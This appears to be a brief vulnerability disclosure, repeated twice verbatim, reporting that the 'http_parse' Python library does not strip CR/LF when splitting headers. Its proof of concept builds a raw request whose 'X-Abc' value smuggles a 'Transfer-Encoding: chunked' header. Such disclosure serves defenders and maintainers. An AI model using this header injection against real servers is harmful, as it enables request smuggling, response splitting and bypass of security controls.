If the headers are externally controlled they can be manipulated to include other headers. The parsing is splitting headers on line 49. by ":"
when reading them line by line. If they include "\r" or "\n" they are not stripped and show up in the output as seperate headers.
It can lead to response splitting, Header manipulation if logged somewhere, sometimes even bypassing security controls.
PoC:
from http_parse import parse
raw_request = """
GET /path HTTP/1.1
Host: example.com
User-Agent: curl/8.5.0
X-Abc:\rTransfer-Encoding: chunked\r\n
{"data": "example"}
"""
parsed = parse(raw_request)
print(parsed.headers) # Access headers (dictionary format) <- here
print(parsed.body) # Access body
print(parsed.path) # Access requested path (/foo/bar)
If the headers are externally controlled they can be manipulated to include other headers. The parsing is splitting headers on line 49. by ":"
when reading them line by line. If they include "\r" or "\n" they are not stripped and show up in the output as seperate headers.
It can lead to response splitting, Header manipulation if logged somewhere, sometimes even bypassing security controls.
PoC:
from http_parse import parse
raw_request = """
GET /path HTTP/1.1
Host: example.com
User-Agent: curl/8.5.0
X-Abc:\rTransfer-Encoding: chunked\r\n
{"data": "example"}
"""
parsed = parse(raw_request)
print(parsed.headers) # Access headers (dictionary format) <- here
print(parsed.body) # Access body
print(parsed.path) # Access requested path (/foo/bar)